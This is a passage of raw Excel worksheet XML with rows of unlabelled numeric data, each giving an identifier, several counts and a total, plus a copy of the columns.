      <c r="E668" s="8">
        <v>2</v>
      </c>
      <c r="F668" s="8">
        <v>3</v>
      </c>
      <c r="G668" s="8">
        <v>1</v>
      </c>
      <c r="H668" s="8">
        <v>41</v>
      </c>
      <c r="K668" s="7">
        <v>1650</v>
      </c>
      <c r="L668" s="8">
        <v>24</v>
      </c>
      <c r="M668" s="8">
        <v>1</v>
      </c>
      <c r="N668" s="8">
        <v>10</v>
      </c>
      <c r="O668" s="8">
        <v>2</v>
      </c>
      <c r="P668" s="8">
        <v>3</v>
      </c>
      <c r="Q668" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="669" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A669" s="7">
        <v>1653</v>
      </c>
      <c r="B669" s="8">
        <v>12</v>
      </c>
      <c r="C669" s="8">
        <v>1</v>
      </c>
      <c r="D669" s="8">
        <v>0</v>
      </c>
      <c r="E669" s="8">
        <v>0</v>
      </c>
      <c r="F669" s="8">
        <v>0</v>
      </c>
      <c r="G669" s="8">
        <v>4</v>
      </c>
      <c r="H669" s="8">
        <v>17</v>
      </c>
      <c r="K669" s="7">
        <v>1653</v>
      </c>
      <c r="L669" s="8">
        <v>12</v>
      </c>
      <c r="M669" s="8">
        <v>1</v>
      </c>
      <c r="N669" s="8">
        <v>0</v>
      </c>
      <c r="O669" s="8">
        <v>0</v>
      </c>
      <c r="P669" s="8">
        <v>0</v>
      </c>
      <c r="Q669" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="670" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A670" s="7">
        <v>1655</v>
      </c>
      <c r="B670" s="8">
        <v>25</v>
      </c>
      <c r="C670" s="8">
        <v>1</v>
      </c>
      <c r="D670" s="8">
        <v>64</v>
      </c>
      <c r="E670" s="8">
        <v>53</v>
      </c>
      <c r="F670" s="8">
        <v>15</v>
      </c>
      <c r="G670" s="8">
        <v>17</v>
      </c>
      <c r="H670" s="8">
        <v>175</v>
      </c>
      <c r="K670" s="7">
        <v>1655</v>
      </c>
      <c r="L670" s="8">
        <v>25</v>
      </c>
      <c r="M670" s="8">
        <v>1</v>
      </c>
      <c r="N670" s="8">
        <v>64</v>
      </c>
      <c r="O670" s="8">
        <v>53</v>
      </c>
      <c r="P670" s="8">
        <v>15</v>
      </c>
      <c r="Q670" s="8">
        <v>17</v>
      </c>
    </row>
    <row r="671" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A671" s="7">
        <v>1656</v>
      </c>
      <c r="B671" s="8">
        <v>30</v>
      </c>
      <c r="C671" s="8">
        <v>0</v>
      </c>
      <c r="D671" s="8">
        <v>1</v>
      </c>
      <c r="E671" s="8">
        <v>0</v>
      </c>
      <c r="F671" s="8">
        <v>4</v>
      </c>
      <c r="G671" s="8">
        <v>0</v>
      </c>
      <c r="H671" s="8">
        <v>35</v>
      </c>
      <c r="K671" s="7">
        <v>1656</v>
      </c>
      <c r="L671" s="8">
        <v>30</v>
      </c>
      <c r="M671" s="8">
        <v>0</v>
      </c>
      <c r="N671" s="8">
        <v>1</v>
      </c>
      <c r="O671" s="8">
        <v>0</v>
      </c>
      <c r="P671" s="8">
        <v>4</v>
      </c>
      <c r="Q671" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="672" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A672" s="7">
        <v>1658</v>
      </c>
      <c r="B672" s="8">
        <v>25</v>
      </c>
      <c r="C672" s="8">
        <v>0</v>
      </c>
      <c r="D672" s="8">
        <v>2</v>
      </c>
      <c r="E672" s="8">
        <v>4</v>
      </c>
      <c r="F672" s="8">
        <v>2</v>
      </c>
      <c r="G672" s="8">
        <v>0</v>
      </c>
      <c r="H672" s="8">
        <v>33</v>
      </c>
      <c r="K672" s="7">
        <v>1658</v>
      </c>
      <c r="L672" s="8">
        <v>25</v>
      </c>
      <c r="M672" s="8">
        <v>0</v>
      </c>
      <c r="N672" s="8">
        <v>2</v>
      </c>
      <c r="O672" s="8">
        <v>4</v>
      </c>
      <c r="P672" s="8">
        <v>2</v>
      </c>
      <c r="Q672" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="673" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A673" s="7">
        <v>1660</v>
      </c>
      <c r="B673" s="8">
        <v>25</v>
      </c>
      <c r="C673" s="8">
        <v>0</v>
      </c>
      <c r="D673" s="8">
        <v>5</v>
      </c>
      <c r="E673" s="8">
        <v>4</v>
      </c>
      <c r="F673" s="8">
        <v>2</v>
      </c>
      <c r="G673" s="8">
        <v>2</v>
      </c>
      <c r="H673" s="8">
        <v>38</v>
      </c>
      <c r="K673" s="7">
        <v>1660</v>
      </c>
      <c r="L673" s="8">
        <v>25</v>
      </c>
      <c r="M673" s="8">
        <v>0</v>
      </c>
      <c r="N673" s="8">
        <v>5</v>
      </c>
      <c r="O673" s="8">
        <v>4</v>
      </c>
      <c r="P673" s="8">
        <v>2</v>
      </c>
      <c r="Q673" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="674" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A674" s="7">
        <v>1661</v>
      </c>
      <c r="B674" s="8">
        <v>30</v>
      </c>
      <c r="C674" s="8">
        <v>1</v>
      </c>
      <c r="D674" s="8">
        <v>57</v>
      </c>
      <c r="E674" s="8">
        <v>441</v>
      </c>
      <c r="F674" s="8">
        <v>3</v>
      </c>
      <c r="G674" s="8">
        <v>20</v>
      </c>
      <c r="H674" s="8">
        <v>552</v>
      </c>
      <c r="K674" s="7">
        <v>1661</v>
      </c>
      <c r="L674" s="8">
        <v>30</v>
      </c>
      <c r="M674" s="8">
        <v>1</v>
      </c>
      <c r="N674" s="8">
        <v>57</v>
      </c>
      <c r="O674" s="8">
        <v>441</v>
      </c>
      <c r="P674" s="8">
        <v>3</v>
      </c>
      <c r="Q674" s="8">
        <v>20</v>
      </c>
    </row>
    <row r="675" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A675" s="7">
        <v>1663</v>
      </c>
      <c r="B675" s="8">
        <v>30</v>
      </c>
      <c r="C675" s="8">
        <v>2</v>
      </c>
      <c r="D675" s="8">
        <v>30</v>
      </c>
      <c r="E675" s="8">
        <v>25</v>
      </c>
      <c r="F675" s="8">
        <v>17</v>
      </c>
      <c r="G675" s="8">
        <v>12</v>
      </c>
      <c r="H675" s="8">
        <v>116</v>
      </c>
      <c r="K675" s="7">
        <v>1663</v>
      </c>
      <c r="L675" s="8">
        <v>30</v>
      </c>
      <c r="M675" s="8">
        <v>2</v>
      </c>
      <c r="N675" s="8">
        <v>30</v>
      </c>
      <c r="O675" s="8">
        <v>25</v>
      </c>
      <c r="P675" s="8">
        <v>17</v>
      </c>
      <c r="Q675" s="8">
        <v>12</v>
      </c>
    </row>
    <row r="676" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A676" s="7">
        <v>1667</v>
      </c>
      <c r="B676" s="8">
        <v>0</v>
      </c>
      <c r="C676" s="8">
        <v>0</v>
      </c>
      <c r="D676" s="8">
        <v>40</v>
      </c>
      <c r="E676" s="8">
        <v>250</v>
      </c>
      <c r="F676" s="8">
        <v>10</v>
      </c>
      <c r="G676" s="8">
        <v>10</v>
      </c>
      <c r="H676" s="8">
        <v>310</v>
      </c>
      <c r="K676" s="7">
        <v>1667</v>
      </c>
      <c r="L676" s="8">
        <v>0</v>
      </c>
      <c r="M676" s="8">
        <v>0</v>
      </c>
      <c r="N676" s="8">
        <v>40</v>
      </c>
      <c r="O676" s="8">
        <v>250</v>
      </c>
      <c r="P676" s="8">
        <v>10</v>
      </c>
      <c r="Q676" s="8">
        <v>10</v>
      </c>
    </row>
    <row r="677" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A677" s="7">
        <v>1668</v>
      </c>
      <c r="B677" s="8">
        <v>25</v>
      </c>
      <c r="C677" s="8">
        <v>3</v>
      </c>
      <c r="D677" s="8">
        <v>22</v>
      </c>
      <c r="E677" s="8">
        <v>165</v>
      </c>
      <c r="F677" s="8">
        <v>53</v>
      </c>
      <c r="G677" s="8">
        <v>40</v>
      </c>
      <c r="H677" s="8">
        <v>308</v>
      </c>
      <c r="K677" s="7">
        <v>1668</v>
      </c>
      <c r="L677" s="8">
        <v>25</v>
      </c>
      <c r="M677" s="8">
        <v>3</v>
      </c>
      <c r="N677" s="8">
        <v>22</v>
      </c>
      <c r="O677" s="8">
        <v>165</v>
      </c>
      <c r="P677" s="8">
        <v>53</v>
      </c>
      <c r="Q677" s="8">
        <v>40</v>
      </c>
    </row>
    <row r="678" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A678" s="7">
        <v>1675</v>
      </c>
      <c r="B678" s="8">
        <v>25</v>
      </c>
      <c r="C678" s="8">
        <v>3</v>
      </c>
      <c r="D678" s="8">
        <v>77</v>
      </c>
      <c r="E678" s="8">
        <v>22</v>
      </c>
      <c r="F678" s="8">
        <v>21</v>
      </c>
      <c r="G678" s="8">
        <v>20</v>
      </c>
      <c r="H678" s="8">
        <v>168</v>
      </c>
      <c r="K678" s="7">
        <v>1675</v>
      </c>
      <c r="L678" s="8">
        <v>25</v>
      </c>
      <c r="M678" s="8">
        <v>3</v>
      </c>
      <c r="N678" s="8">
        <v>77</v>
      </c>
      <c r="O678" s="8">
        <v>22</v>
      </c>
      <c r="P678" s="8">
        <v>21</v>
      </c>
      <c r="Q678" s="8">
        <v>20</v>
      </c>
    </row>
    <row r="679" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A679" s="7">
        <v>1676</v>
      </c>
      <c r="B679" s="8">
        <v>25</v>
      </c>
      <c r="C679" s="8">
        <v>1</v>
      </c>
      <c r="D679" s="8">
        <v>12</v>
      </c>
      <c r="E679" s="8">
        <v>23</v>
      </c>
      <c r="F679" s="8">
        <v>2</v>
      </c>
      <c r="G679" s="8">
        <v>0</v>
      </c>
      <c r="H679" s="8">
        <v>63</v>
      </c>
      <c r="K679" s="7">
        <v>1676</v>
      </c>
      <c r="L679" s="8">
        <v>25</v>
      </c>
      <c r="M679" s="8">
        <v>1</v>
      </c>
      <c r="N679" s="8">
        <v>12</v>
      </c>
      <c r="O679" s="8">
        <v>23</v>
      </c>
      <c r="P679" s="8">
        <v>2</v>
      </c>
      <c r="Q679" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="680" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A680" s="7">
        <v>1678</v>
      </c>
      <c r="B680" s="8">
        <v>25</v>
      </c>
      <c r="C680" s="8">
        <v>1</v>
      </c>
      <c r="D680" s="8">
        <v>5</v>
      </c>
      <c r="E680" s="8">
        <v>5</v>
      </c>
      <c r="F680" s="8">
        <v>8</v>
      </c>
      <c r="G680" s="8">
        <v>3</v>
      </c>
      <c r="H680" s="8">
        <v>47</v>
      </c>
      <c r="K680" s="7">
        <v>1678</v>
      </c>
      <c r="L680" s="8">
        <v>25</v>
      </c>
      <c r="M680" s="8">
        <v>1</v>
      </c>
      <c r="N680" s="8">
        <v>5</v>
      </c>
      <c r="O680" s="8">
        <v>5</v>
      </c>
      <c r="P680" s="8">
        <v>8</v>
      </c>
      <c r="Q680" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="681" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A681" s="7">
        <v>1679</v>
      </c>
      <c r="B681" s="8">
        <v>5</v>
      </c>
      <c r="C681" s="8">
        <v>3</v>
      </c>
      <c r="D681" s="8">
        <v>6</v>
      </c>
      <c r="E681" s="8">
        <v>2</v>
      </c>
      <c r="F681" s="8">
        <v>6</v>
      </c>
      <c r="G681" s="8">
        <v>1</v>
      </c>
      <c r="H681" s="8">
        <v>23</v>
      </c>
      <c r="K681" s="7">
        <v>1679</v>
      </c>
      <c r="L681" s="8">
        <v>5</v>
      </c>
      <c r="M681" s="8">
        <v>3</v>
      </c>
      <c r="N681" s="8">
        <v>6</v>
      </c>
      <c r="O681" s="8">
        <v>2</v>
      </c>
      <c r="P681" s="8">
        <v>6</v>
      </c>
      <c r="Q681" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="682" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A682" s="7">
        <v>1682</v>
      </c>
      <c r="B682" s="8">
        <v>0</v>
      </c>
      <c r="C682" s="8">
        <v>0</v>
      </c>
      <c r="D682" s="8">
        <v>6</v>
      </c>
      <c r="E682" s="8">
        <v>5</v>
      </c>
      <c r="F682" s="8">
        <v>7</v>
      </c>
      <c r="G682" s="8">
        <v>4</v>
      </c>
      <c r="H682" s="8">
        <v>22</v>
      </c>
      <c r="K682" s="7">
        <v>1682</v>
      </c>
      <c r="L682" s="8">
        <v>0</v>
      </c>
      <c r="M682" s="8">
        <v>0</v>
      </c>
      <c r="N682" s="8">
        <v>6</v>
      </c>
      <c r="O682" s="8">
        <v>5</v>
      </c>
      <c r="P682" s="8">
        <v>7</v>
      </c>
      <c r="Q682" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="683" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A683" s="7">
        <v>1687</v>
      </c>
      <c r="B683" s="8">
        <v>300</v>
      </c>
      <c r="C683" s="8">
        <v>1</v>
      </c>
      <c r="D683" s="8">
        <v>5</v>
      </c>
      <c r="E683" s="8">
        <v>5</v>
      </c>
      <c r="F683" s="8">
        <v>2</v>
      </c>
      <c r="G683" s="8">
        <v>2</v>
      </c>
      <c r="H683" s="8">
        <v>315</v>
      </c>
      <c r="K683" s="7">
        <v>1687</v>
      </c>
      <c r="L683" s="8">
        <v>300</v>
      </c>
      <c r="M683" s="8">
        <v>1</v>
      </c>
      <c r="N683" s="8">
        <v>5</v>
      </c>
      <c r="O683" s="8">
        <v>5</v>
      </c>
      <c r="P683" s="8">
        <v>2</v>
      </c>
      <c r="Q683" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="684" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A684" s="7">
        <v>1688</v>
      </c>
      <c r="B684" s="8">
        <v>5</v>
      </c>
      <c r="C684" s="8">
        <v>1</v>
      </c>
      <c r="D684" s="8">
        <v>0</v>
      </c>
      <c r="E684" s="8">
        <v>0</v>
      </c>
      <c r="F684" s="8">
        <v>4</v>
      </c>
      <c r="G684" s="8">
        <v>1</v>
      </c>
      <c r="H684" s="8">
        <v>11</v>
      </c>
      <c r="K684" s="7">
        <v>1688</v>
      </c>
      <c r="L684" s="8">
        <v>5</v>
      </c>
      <c r="M684" s="8">
        <v>1</v>
      </c>
      <c r="N684" s="8">
        <v>0</v>
      </c>
      <c r="O684" s="8">
        <v>0</v>
      </c>
      <c r="P684" s="8">
        <v>4</v>
      </c>
      <c r="Q684" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="685" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A685" s="7">
        <v>1689</v>
      </c>
      <c r="B685" s="8">
        <v>0</v>
      </c>
      <c r="C685" s="8">
        <v>0</v>
      </c>
      <c r="D685" s="8">
        <v>0</v>
      </c>
      <c r="E685" s="8">
        <v>0</v>
      </c>
      <c r="F685" s="8">
        <v>7</v>
      </c>
      <c r="G685" s="8">
        <v>2</v>
      </c>
      <c r="H685" s="8">
        <v>9</v>
      </c>
      <c r="K685" s="7">
        <v>1689</v>
      </c>
      <c r="L685" s="8">
        <v>0</v>
      </c>
      <c r="M685" s="8">
        <v>0</v>
      </c>
      <c r="N685" s="8">
        <v>0</v>
      </c>
      <c r="O685" s="8">
        <v>0</v>
      </c>
      <c r="P685" s="8">
        <v>7</v>
      </c>
      <c r="Q685" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="686" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A686" s="7">
        <v>1690</v>
      </c>
      <c r="B686" s="8">
        <v>13</v>
      </c>
      <c r="C686" s="8">
        <v>1</v>
      </c>
      <c r="D686" s="8">
        <v>0</v>
      </c>
      <c r="E686" s="8">
        <v>0</v>
      </c>
      <c r="F686" s="8">
        <v>6</v>
      </c>
      <c r="G686" s="8">
        <v>5</v>
      </c>
      <c r="H686" s="8">
        <v>25</v>
      </c>
      <c r="K686" s="7">
        <v>1690</v>
      </c>
      <c r="L686" s="8">
        <v>13</v>
      </c>
      <c r="M686" s="8">
        <v>1</v>
      </c>
      <c r="N686" s="8">
        <v>0</v>
      </c>
      <c r="O686" s="8">
        <v>0</v>
      </c>
      <c r="P686" s="8">
        <v>6</v>
      </c>
      <c r="Q686" s="8">
        <v>5</v>
      </c>
    </row>
    <row r="687" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A687" s="7">
        <v>1691</v>
      </c>
      <c r="B687" s="8">
        <v>26</v>
      </c>
      <c r="C687" s="8">
        <v>2</v>
      </c>
      <c r="D687" s="8">
        <v>5</v>
      </c>
      <c r="E687" s="8">
        <v>7</v>
      </c>
      <c r="F687" s="8">
        <v>7</v>
      </c>
      <c r="G687" s="8">
        <v>1</v>
      </c>
      <c r="H687" s="8">
        <v>48</v>
      </c>
      <c r="K687" s="7">
        <v>1691</v>
      </c>
      <c r="L687" s="8">
        <v>26</v>
      </c>
      <c r="M687" s="8">
        <v>2</v>
      </c>
      <c r="N687" s="8">
        <v>5</v>
      </c>
      <c r="O687" s="8">
        <v>7</v>
      </c>
      <c r="P687" s="8">
        <v>7</v>
      </c>
      <c r="Q687" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="688" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A688" s="7">
        <v>1699</v>
      </c>
      <c r="B688" s="8">
        <v>25</v>
      </c>
      <c r="C688" s="8">
        <v>1</v>
      </c>
      <c r="D688" s="8">
        <v>3</v>
      </c>
      <c r="E688" s="8">
        <v>0</v>
      </c>
      <c r="F688" s="8">
        <v>18</v>
      </c>
      <c r="G688" s="8">
        <v>29</v>
      </c>
      <c r="H688" s="8">
        <v>76</v>
      </c>
      <c r="K688" s="7">
        <v>1699</v>
      </c>
      <c r="L688" s="8">
        <v>25</v>
      </c>
      <c r="M688" s="8">
        <v>1</v>
      </c>
      <c r="N688" s="8">
        <v>3</v>
      </c>
      <c r="O688" s="8">
        <v>0</v>
      </c>
      <c r="P688" s="8">
        <v>18</v>
      </c>
      <c r="Q688" s="8">
        <v>29</v>
      </c>
    </row>
    <row r="689" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A689" s="7">
        <v>1700</v>
      </c>
      <c r="B689" s="8">
        <v>25</v>
      </c>
      <c r="C689" s="8">
        <v>2</v>
      </c>
      <c r="D689" s="8">
        <v>4</v>
      </c>
      <c r="E689" s="8">
        <v>5</v>
      </c>
      <c r="F689" s="8">
        <v>13</v>
      </c>
      <c r="G689" s="8">
        <v>13</v>
      </c>
      <c r="H689" s="8">
        <v>62</v>
      </c>
      <c r="K689" s="7">
        <v>1700</v>
      </c>
      <c r="L689" s="8">
        <v>25</v>
      </c>
      <c r="M689" s="8">
        <v>2</v>
      </c>
      <c r="N689" s="8">
        <v>4</v>
      </c>
      <c r="O689" s="8">
        <v>5</v>
      </c>
      <c r="P689" s="8">
        <v>13</v>
      </c>
      <c r="Q689" s="8">
        <v>13</v>
      </c>
    </row>
    <row r="690" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A690" s="7">
        <v>1701</v>
      </c>
      <c r="B690" s="8">
        <v>6</v>
      </c>
      <c r="C690" s="8">
        <v>1</v>
      </c>
      <c r="D690" s="8">
        <v>0</v>
      </c>
      <c r="E690" s="8">
        <v>0</v>
      </c>
      <c r="F690" s="8">
        <v>0</v>
      </c>
      <c r="G690" s="8">
        <v>10</v>
      </c>
      <c r="H690" s="8">
        <v>17</v>
      </c>
      <c r="K690" s="7">
        <v>1701</v>
      </c>
      <c r="L690" s="8">
        <v>6</v>
      </c>
      <c r="M690" s="8">
        <v>1</v>
      </c>
      <c r="N690" s="8">
        <v>0</v>
      </c>
      <c r="O690" s="8">
        <v>0</v>
      </c>
      <c r="P690" s="8">
        <v>0</v>
      </c>
      <c r="Q690" s="8">
        <v>10</v>
      </c>
    </row>
    <row r="691" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A691" s="7">
        <v>1713</v>
      </c>
      <c r="B691" s="8">
        <v>6</v>
      </c>
      <c r="C691" s="8">
        <v>0</v>
      </c>
      <c r="D691" s="8">
        <v>5</v>
      </c>
      <c r="E691" s="8">
        <v>0</v>
      </c>
      <c r="F691" s="8">
        <v>3</v>
      </c>
      <c r="G691" s="8">
        <v>4</v>
      </c>
      <c r="H691" s="8">
        <v>18</v>
      </c>
      <c r="K691" s="7">
        <v>1713</v>
      </c>
      <c r="L691" s="8">
        <v>6</v>
      </c>
      <c r="M691" s="8">
        <v>0</v>
      </c>
      <c r="N691" s="8">
        <v>5</v>
      </c>
      <c r="O691" s="8">
        <v>0</v>
      </c>
      <c r="P691" s="8">
        <v>3</v>
      </c>
      <c r="Q691" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="692" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A692" s="7">
        <v>1714</v>
      </c>
      <c r="B692" s="8">
        <v>0</v>
      </c>
      <c r="C692" s="8">
        <v>0</v>
      </c>
      <c r="D692" s="8">
        <v>14</v>
      </c>
      <c r="E692" s="8">
        <v>1</v>
      </c>
      <c r="F692" s="8">
        <v>7</v>
      </c>
      <c r="G692" s="8">
        <v>3</v>
      </c>
      <c r="H692" s="8">
        <v>25</v>
      </c>
      <c r="K692" s="7">
        <v>1714</v>
      </c>
      <c r="L692" s="8">
        <v>0</v>
      </c>
      <c r="M692" s="8">
        <v>0</v>
      </c>
      <c r="N692" s="8">
        <v>14</v>
      </c>
      <c r="O692" s="8">
        <v>1</v>
      </c>
      <c r="P692" s="8">
        <v>7</v>
      </c>
      <c r="Q692" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="693" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A693" s="7">
        <v>1715</v>
      </c>
      <c r="B693" s="8">
        <v>6</v>
      </c>
      <c r="C693" s="8">
        <v>0</v>
      </c>
      <c r="D693" s="8">
        <v>15</v>
      </c>
      <c r="E693" s="8">
        <v>79</v>
      </c>
      <c r="F693" s="8">
        <v>19</v>
      </c>
      <c r="G693" s="8">
        <v>7</v>
      </c>
      <c r="H693" s="8">
        <v>126</v>
      </c>
      <c r="K693" s="7">
        <v>1715</v>
      </c>
      <c r="L693" s="8">
        <v>6</v>
      </c>
      <c r="M693" s="8">
        <v>0</v>
      </c>
      <c r="N693" s="8">
        <v>15</v>
      </c>
      <c r="O693" s="8">
        <v>79</v>
      </c>
      <c r="P693" s="8">
        <v>19</v>
      </c>
      <c r="Q693" s="8">
        <v>7</v>
      </c>
    </row>
    <row r="694" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A694" s="7">
        <v>1718</v>
      </c>
      <c r="B694" s="8">
        <v>26</v>
      </c>
      <c r="C694" s="8">
        <v>1</v>
      </c>
      <c r="D694" s="8">
        <v>0</v>
      </c>
      <c r="E694" s="8">
        <v>0</v>
      </c>
      <c r="F694" s="8">
        <v>5</v>
      </c>
      <c r="G694" s="8">
        <v>23</v>
      </c>
      <c r="H694" s="8">
        <v>55</v>
      </c>
      <c r="K694" s="7">
        <v>1718</v>
      </c>
      <c r="L694" s="8">
        <v>26</v>
      </c>
      <c r="M694" s="8">
        <v>1</v>
      </c>
      <c r="N694" s="8">
        <v>0</v>
      </c>
      <c r="O694" s="8">
        <v>0</v>
      </c>
      <c r="P694" s="8">
        <v>5</v>
      </c>
      <c r="Q694" s="8">
        <v>23</v>
      </c>
    </row>
    <row r="695" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A695" s="7">
        <v>1720</v>
      </c>
      <c r="B695" s="8">
        <v>15</v>
      </c>
      <c r="C695" s="8">
        <v>1</v>
      </c>
      <c r="D695" s="8">
        <v>17</v>
      </c>
      <c r="E695" s="8">
        <v>65</v>
      </c>
      <c r="F695" s="8">
        <v>22</v>
      </c>
      <c r="G695" s="8">
        <v>87</v>
      </c>
      <c r="H695" s="8">
        <v>207</v>
      </c>
      <c r="K695" s="7">
        <v>1720</v>
      </c>
      <c r="L695" s="8">
        <v>15</v>
      </c>
      <c r="M695" s="8">
        <v>1</v>
      </c>
      <c r="N695" s="8">
        <v>17</v>
      </c>
      <c r="O695" s="8">
        <v>65</v>
      </c>
      <c r="P695" s="8">
        <v>22</v>
      </c>
      <c r="Q695" s="8">
        <v>87</v>
      </c>
    </row>
    <row r="696" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A696" s="7">
        <v>1725</v>
      </c>
      <c r="B696" s="8">
        <v>24</v>
      </c>
      <c r="C696" s="8">
        <v>1</v>
      </c>
      <c r="D696" s="8">
        <v>11</v>
      </c>
      <c r="E696" s="8">
        <v>62</v>
      </c>
      <c r="F696" s="8">
        <v>3</v>
      </c>
      <c r="G696" s="8">
        <v>7</v>
      </c>
      <c r="H696" s="8">
        <v>108</v>
      </c>
      <c r="K696" s="7">
        <v>1725</v>
      </c>
      <c r="L696" s="8">
        <v>24</v>
      </c>
      <c r="M696" s="8">
        <v>1</v>
      </c>
      <c r="N696" s="8">
        <v>11</v>
      </c>
      <c r="O696" s="8">
        <v>62</v>
      </c>
      <c r="P696" s="8">
        <v>3</v>
      </c>
      <c r="Q696" s="8">
        <v>7</v>
      </c>
    </row>
    <row r="697" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A697" s="7">
        <v>1729</v>
      </c>
      <c r="B697" s="8">
        <v>26</v>
      </c>
      <c r="C697" s="8">
        <v>0</v>
      </c>
      <c r="D697" s="8">
        <v>4</v>
      </c>
      <c r="E697" s="8">
        <v>15</v>
      </c>
      <c r="F697" s="8">
        <v>11</v>
      </c>
      <c r="G697" s="8">
        <v>23</v>
      </c>
      <c r="H697" s="8">
        <v>79</v>
      </c>
      <c r="K697" s="7">
        <v>1729</v>
      </c>
      <c r="L697" s="8">
        <v>26</v>
      </c>
      <c r="M697" s="8">
        <v>0</v>
      </c>
      <c r="N697" s="8">
        <v>4</v>
      </c>
      <c r="O697" s="8">
        <v>15</v>
      </c>
      <c r="P697" s="8">
        <v>11</v>
      </c>
      <c r="Q697" s="8">
        <v>23</v>
      </c>
    </row>
    <row r="698" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A698" s="7">
        <v>1732</v>
      </c>
      <c r="B698" s="8">
        <v>25</v>
      </c>
      <c r="C698" s="8">
        <v>1</v>
      </c>
      <c r="D698" s="8">
        <v>6</v>
      </c>
      <c r="E698" s="8">
        <v>4</v>
      </c>
      <c r="F698" s="8">
        <v>13</v>
      </c>
      <c r="G698" s="8">
        <v>7</v>
      </c>
      <c r="H698" s="8">
        <v>56</v>
      </c>
      <c r="K698" s="7">
        <v>1732</v>
      </c>
      <c r="L698" s="8">
        <v>25</v>
      </c>
      <c r="M698" s="8">
        <v>1</v>
      </c>
      <c r="N698" s="8">
        <v>6</v>
      </c>
      <c r="O698" s="8">
        <v>4</v>
      </c>
      <c r="P698" s="8">
        <v>13</v>
      </c>
      <c r="Q698" s="8">
        <v>7</v>
      </c>
    </row>
    <row r="699" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A699" s="7">
        <v>1733</v>
      </c>
      <c r="B699" s="8">
        <v>25</v>
      </c>
      <c r="C699" s="8">
        <v>2</v>
      </c>
      <c r="D699" s="8">
        <v>44</v>
      </c>
      <c r="E699" s="8">
        <v>120</v>
      </c>
      <c r="F699" s="8">
        <v>26</v>
      </c>
      <c r="G699" s="8">
        <v>8</v>
      </c>
      <c r="H699" s="8">
        <v>225</v>
      </c>
      <c r="K699" s="7">
        <v>1733</v>
      </c>
      <c r="L699" s="8">
        <v>25</v>
      </c>
      <c r="M699" s="8">
        <v>2</v>
      </c>
      <c r="N699" s="8">
        <v>44</v>
      </c>
      <c r="O699" s="8">
        <v>120</v>
      </c>
      <c r="P699" s="8">
        <v>26</v>
      </c>
      <c r="Q699" s="8">
        <v>8</v>
      </c>
    </row>
    <row r="700" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A700" s="7">
        <v>1734</v>
      </c>
      <c r="B700" s="8">
        <v>22</v>
      </c>
      <c r="C700" s="8">
        <v>1</v>
      </c>
      <c r="D700" s="8">
        <v>14</v>
      </c>
      <c r="E700" s="8">
        <v>8</v>
      </c>
      <c r="F700" s="8">
        <v>2</v>
      </c>
      <c r="G700" s="8">
        <v>1</v>
      </c>
      <c r="H700" s="8">
        <v>48</v>
      </c>
      <c r="K700" s="7">
        <v>1734</v>
      </c>
      <c r="L700" s="8">
        <v>22</v>
      </c>
      <c r="M700" s="8">
        <v>1</v>
      </c>
      <c r="N700" s="8">
        <v>14</v>
      </c>
      <c r="O700" s="8">
        <v>8</v>
      </c>
      <c r="P700" s="8">
        <v>2</v>
      </c>
      <c r="Q700" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="701" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A701" s="7">
        <v>1739</v>
      </c>
      <c r="B701" s="8">
        <v>30</v>
      </c>
      <c r="C701" s="8">
        <v>1</v>
      </c>
      <c r="D701" s="8">
        <v>6</v>
      </c>
      <c r="E701" s="8">
        <v>0</v>
      </c>
      <c r="F701" s="8">
        <v>8</v>
      </c>
      <c r="G701" s="8">
        <v>0</v>
      </c>
      <c r="H701" s="8">
        <v>45</v>
      </c>
      <c r="K701" s="7">
        <v>1739</v>
      </c>
      <c r="L701" s="8">
        <v>30</v>
      </c>
      <c r="M701" s="8">
        <v>1</v>
      </c>
      <c r="N701" s="8">
        <v>6</v>
      </c>
      <c r="O701" s="8">
        <v>0</v>
      </c>
      <c r="P701" s="8">
        <v>8</v>
      </c>
      <c r="Q701" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="702" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A702" s="7">
        <v>1742</v>
      </c>
      <c r="B702" s="8">
